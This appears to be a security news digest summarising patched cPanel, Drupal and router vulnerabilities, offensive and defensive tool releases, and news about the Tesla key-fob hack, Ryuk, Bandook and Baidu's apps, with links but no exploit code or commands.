Digest without zero-day, with malware and Tesla news

There are no zero-day vulnerabilities or new headliners in this digest. But there are new tool updates and different news + research.

  • Vulnerabilities: No zero-day, only emergency update for Drupal and cPanel, couple exploits for routers;
  • Tools: Update powerfull intellegence tool and others;
  • News: Tesla hacked! Next story about Sopra Steria and malware actions. Baidu was deleted from Google play 🙁 ;
  • Research: Ransomware Attacks against Microsoft Defender and you can find other usefull strings 🙂

Really short feedback -> here


Vulnerabilities

Critical vulnerability was found in cPanel that allows to bypass 2FA. Aa issue that allows bypassing 2FA authentication of cPanel accounts was found in the most popular hosting control panel.

Two-factor authentication in older versions of cPanel and WebHost Manager (WHM) was vulnerable to brute force attacks that allowed attackers to pick up URL parameters and bypass 2FA if enabled for the account.

cPanel developers responded to a specialist reporting and the vulnerability was fixed. All users are encouraged to upgrade cPanel and WHM to the fixed versions 11.92.0.2, 11.90.0.17 and 11.86.0.32 as soon as possible.

https://vulners.com/thn/THN:A7B8EDD6FA870FFB004B59A8BB3216E1

Drupal team fixed two vulnerabilities in remote code execution.

  1. The first one is related to incorrect verification of entered data when processing URI in file names CVE-2020-28948;
  2. The second is related to unsafe data verification when processing serialized information. CVE-2020-28949.

https://vulners.com/drupal/DRUPAL-SA-CORE-2020-013

CVE-2020-24363

Vulnerability in popular wi-fi router TP-Link TL-WA855RE allows an unauthenticated attacker reset and reboot the device. An attacker can gain full access control by setting a new administrator password instead of the standard one from the manual.

Exploit: https://vulners.com/exploitdb/EDB-ID:49092

A couple of exploits for BigBlueButton. It is open source web conferencing software. The system is designed for distance learning.

E-mail Validation Bypass: https://vulners.com/packetstorm/PACKETSTORM:160239

Brute Force: https://vulners.com/packetstorm/PACKETSTORM:160238


Tools

IntelOwl 1.9.0 released IntelOwl is your friendly threat intelligence tool for malware analysis and security research! Check the release details here: https://github.com/intelowlproject/IntelOwl/releases

Project: https://github.com/intelowlproject/IntelOwl

Docs: https://intelowl.readthedocs.io

Talon
It is a tool designed to perform automated password guessing attacks while remaining undetected. Talon can enumerate a list of users to identify which users are valid, using Kerberos. Talon can also perform a password guessing attack against the Kerberos and LDAPS (LDAP Secure) services.

https://vulners.com/kitploit/KITPLOIT:2982850037566839307

elk-tls-docker: A new open-source tool to stand up Elastic Security stack using self-signed or LetsEncrypt certificates:

https://github.com/swimlane/elk-tls-docker

RedShell
An interactive command prompt that executes commands through proxychains and automatically logs them on a Cobalt Strike team server.

https://vulners.com/kitploit/KITPLOIT:1009239299709344568


News

Researchers from the COSIC group of the University of Leuven (Belgium), having bought a used electronic control unit (ECU) Tesla Model X on eBay, gutted it and found out that there were vulnerabilities in the authentication process of the key fob using the Bluetooth Low Energy (BLE) protocol. Thanks to this, the researchers were able to use a modified ECU to inject malicious firmware onto the key fob, and then receive an unlock message from it.

Thus, with the help of a device made of modified ECU and keychain, Raspberry Pi with CAN interface and battery, the Belgians were able to steal Tesla Model X. The whole process is in a short clip, which is contained in the report, it takes only two or three minutes. The only limitation – an intruder to synchronize the owner’s key fob with a modified ECU must approach it at a distance of less than 5 meters, but it takes only a few seconds.

https://vulners.com/threatpost/THREATPOST:09B5423D2CCF69E5E3DC9409EB575216

Ryuk successfully attacked French IT giant Sopra Steria, resulting in the company’s network falling. The company has been recovering its resources for almost a month and said that the Ryuk attack will eventually lead to losses ranging from 40 to 50 million euros.

We already wrote about this company in our digest last month: Bug Parade with all headliners, zero-days and malware news

Sopra Steria reported that no information leaks identified at this stage. Lately, these are frequent words of many attacked people. As a result, it often turns out that the company has already paid the ransom and “recovered”.

https://vulners.com/hackread/HACKREAD:638FD52F7A526876477E44B62533A31B

Checkpoint talked about the new activity of the Bandook Trojan, which once again confirms that the malware is part of the infrastructure of a hired actor, carrying out cyberoffensive operations under contract in the interests of various intelligence agencies.

In 2019, with the help of Bandook was conducted operation Dark Caracal, which exfiltrated hundreds of gigabytes of information belonging to hundreds of victims from 21 countries in North America, Europe and Asia.

The attack begins with a phishing document containing a malicious macro that loads the PowerShell loader. The loader, in turn, delivers the RAT Bandook itself. This is a full-fledged cyber-spyware tool that contains all the necessary functions – gathering system information, working with files, the ability to take screenshots, and so on.

https://vulners.com/thn/THN:53943CA671B8B44BEC3928429FF1024B

Baidu’s Android apps caught collecting user data. Baidu Maps and Baidu Search Box apps were caught collecting user data and removed from the Google Play Store.

Palo Alto Networks reports that a similar code for data collection was found in the ShareSDK developed by the Chinese giant MobTech. Used by over 37,500 apps, this SDK also allows app developers to collect information about phone model, screen resolution, MAC addresses, Android ID, advertising ID, carrier information, IMSI, and IMEI.

Baidu’s representatives explain that it was not the data collection that caused the apps to be removed from the Play Store (as the Chinese company received permission from users to collect this information). The problem was precisely that Google engineers had discovered other problems that Baidu was already working on to solve.

https://vulners.com/thn/THN:2E8D61B80974C445E3A551536FADB494


Research

1000+ iq

A tale of evasion in a restricted enviroment: DLL Side-loading + Phantom DLL hollowing + Google Apps Script for C2 communications: https://www.blackarrow.net/hindering-threat-hunting-a-tale-of-evasion-in-a-restricted-environment

Demystifying Ransomware Attacks against Microsoft Defender Solution: https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947?WT.mc_id=modinfra-0000-abartolo

InfoSec Black Friday Deals 2020 (updated). https://github.com/0x90n/InfoSec-Black-Friday and https://github.com/Securityinfos/Black-Friday-Deals

Cross-site Scripting via WHOIS and DNS Records: https://medium.com/tenable-techblog/cross-site-scripting-via-whois-and-dns-records-a25c33667fff


Really short feedback -> here

Leave a Reply